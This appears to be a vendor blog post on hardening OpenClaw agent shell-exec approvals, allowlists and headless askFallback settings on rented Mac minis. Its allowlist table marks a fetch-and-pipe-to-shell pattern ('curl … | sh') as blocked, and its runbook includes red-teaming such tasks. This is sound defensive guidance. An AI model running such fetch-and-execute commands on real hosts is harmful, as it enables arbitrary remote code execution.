Can OpenClaw run exec without prompts under launchd?

You can configure exec policies for unattended hosts, but the effective policy is the strictest combination of tools.exec security, ask mode, and allowlists. Headless servers must define explicit deny/allowlist behavior and a safe askFallback—usually deny—so agents do not stall waiting for a GUI approval that will never arrive.

Is allowlist enough on a shared rented Mac mini?

Allowlists reduce blast radius but do not replace macOS user separation, secrets hygiene, and structured logging. Pair exec policy with separate automation accounts and disk isolation patterns documented in other VmMac runbooks.

Which regions should share the same exec policy file revision?

Hong Kong, Japan, Korea, Singapore, and the United States hosts should carry the same revision hash for policy artifacts checked into git to avoid silent divergence.

Security April 24, 2026

OpenClaw Exec Approvals and Allowlists on Shared Rented Mac mini: 2026 Matrix on VmMac

VmMac Engineering Team April 24, 2026 ~24 min read

Platform security owners who deploy OpenClaw on rented Apple Silicon Mac mini from VmMac must treat tools.exec as host-level root authority, not “just another plugin.” Community documentation describes exec approvals as the interlock between autonomous agents and shell commands: policies combine security mode, ask behavior, and allowlists, with a conservative askFallback when no UI is present. This 2026 matrix translates those concepts into operations for launchd-managed gateways across Hong Kong, Japan, Korea, Singapore, and the United States. Pair it with secrets and plist hygiene, staging vs production launchd isolation, and Node PATH discipline so approvals never become the only line of defense.

VmMac provides SSH and optional VNC; you own policy files and audit trails. Use help docs for access patterns and pricing when you split prod agents onto dedicated hosts after tightening exec.

Shared-Tenant Threat Model on a Single macOS Host

When two squads share one macOS user—or even separate users but one admin group—exec allowlists still cannot prevent a compromised dependency from rewriting policy files on disk. Encode layers: non-admin automation accounts, immutable policy artifacts in git with checksum verification on boot, and separate OpenClaw state roots per environment. If more than one human has sudo on the same host that runs unattended agents, classify the machine as non-compliant until roles are split.

Numeric alert: pager when exec.approval.requested events exceed 40 per hour on unattended lanes—usually a policy bug or a prompt storm.
Numeric alert: block promotion when deny outcomes exceed 15% of exec attempts in a rolling day; you may be under-automating safely.

tools.exec.security: deny, allowlist, and full

Mode	Meaning	Best fit on VmMac mini	Risk note
`deny`	Block all host exec	Read-only research bots	Zero shell exfil; may break workflows
`allowlist`	Only matched commands	Default for shared CI-adjacent hosts	Requires disciplined list reviews weekly
`full`	Permissive execution	Ephemeral sandboxes only	Treat as temporary; max 72h TTL

Ask Modes, Prompt Storms, and askFallback for Headless launchd

Ask policies decide whether operators must acknowledge risky commands. Under launchd, always ask without a companion UI becomes a self-inflicted outage: tasks stall until timeout. Prefer on-miss with a tight allowlist for unattended hosts, and set askFallback to deny unless you operate a staffed control channel 24/7. When product releases change approval semantics—as upstream discussions in 2026 highlighted—pin OpenClaw versions and rehearse upgrades on a staging mini before production.

Headless rule: if no human can answer within 120 seconds, unattended exec must deny by default and log structured context for later approval.

Allowlist Shape: Prefixes, argv Patterns, and Auditability

Good allowlists read like infrastructure code: explicit binaries under /usr/bin, /bin, and your pinned toolchains—never broad sh -c wildcards unless wrapped by a reviewed script checked into git. Rotate lists when dependencies move paths after Homebrew upgrades; correlate with install & deploy guide checkpoints.

Split allowlists into three layers for readability: bootstrap (package managers and health probes), build (compilers and test runners), and deploy (rsync/scp/curl to approved endpoints). Each layer should carry its own owner in CODEOWNERS. During incidents, freeze edits to non-bootstrap layers first so operators can still restart gateways without widening full mode. Keep a temporary break-glass entry that expires after 48 hours with an automatic revert ticket—human forgetfulness is how wildcard shells return.

Pattern	Verdict	Why
`/opt/homebrew/bin/git` with fixed subcommands	✓ Prefer	Auditable argv surface
`bash -lc "curl … \| sh"`	✗ Block	Unbounded downstream exec
Wrapper script in `/usr/local/bin/vm-`*	✓ If signed + versioned	Centralizes policy changes

Why launchd Changes the Approval UX

Interactive Mac users resolve approvals in a UI session. launchd agents do not. Bridge the gap with either a paired operator workflow (alerts to Slack with signed approval links) or a dedicated VNC break-glass account for rare interactive resolves—document both in your runbook alongside VNC hardening. Never leave agents waiting on GUI prompts that nobody watches overnight.

Measure queue depth for pending approvals: if the backlog exceeds 5 items for more than 10 minutes, page infrastructure—not the ML team. Sustained backlog usually means your allowlist is too tight for real tasks or your ask mode is mis-set for unattended lanes. After each incident, capture the denied argv prefix in your postmortem template so the same miss does not require a second human wake-up call within 30 days.

For multi-agent fleets described in 24h automation patterns, shard high-risk tools onto hosts with stricter deny defaults while leaving read-mostly researchers on separate labels—mixed risk on one plist is how approvals become noise.

Seven-Step Hardening Runbook

Inventory every tool that calls host exec; tag each as required or delete.
Set tools.exec.security=allowlist in staging; capture denials for seven days.
Build allowlist revision v1 with ≤ 25 entries; justify each in git blame.
Set ask to on-miss with askFallback=deny on unattended hosts.
Wire structured logs for approval events per rotation guidance.
Rehearse upgrade on a VmMac mini in each of five regions before flipping prod.
Quarterly red-team: attempt curl | bash style tasks and confirm deny paths.

Five-Region Policy Parity

Latency does not change exec semantics, but operator calendars do: a Singapore Friday deploy might miss US Thursday policy drift. Store policy checksums in your observability stack and fail CI if a region drifts by more than one revision. Add capacity from pricing before you temporarily widen allowlists under load—that shortcut ages into debt within days.

FAQ: Exec Approvals on Rented Mac mini

Should prod and staging share one allowlist? No—fork files and merge with review like application code.

Does VmMac enforce OpenClaw policies? No—you implement them; VmMac provides the Mac mini and network path.

What if upgrades re-enable prompts? Pin versions, read upstream release notes, and rehearse on staging per gateway recovery playbooks.

Why Mac mini M4 and VmMac Still Fit High-Assurance Agents

Apple Silicon Mac mini gives predictable single-host performance for always-on agents while keeping physical TCC boundaries clearer than nested VMs. Renting across Hong Kong, Japan, Korea, Singapore, and the United States lets you isolate risky exec policies onto smaller fleets before promoting globally. VmMac is not a policy engine—it is metal you can segment. Pair hardware tenancy with exec allowlists, and autonomous tools finally look boring on the balance sheet.

Isolate Agents Before You Widen Exec

Add a dedicated Mac mini in the nearest VmMac region for staging approvals and allowlist burn-in.

Compare plans OpenClaw deploy guide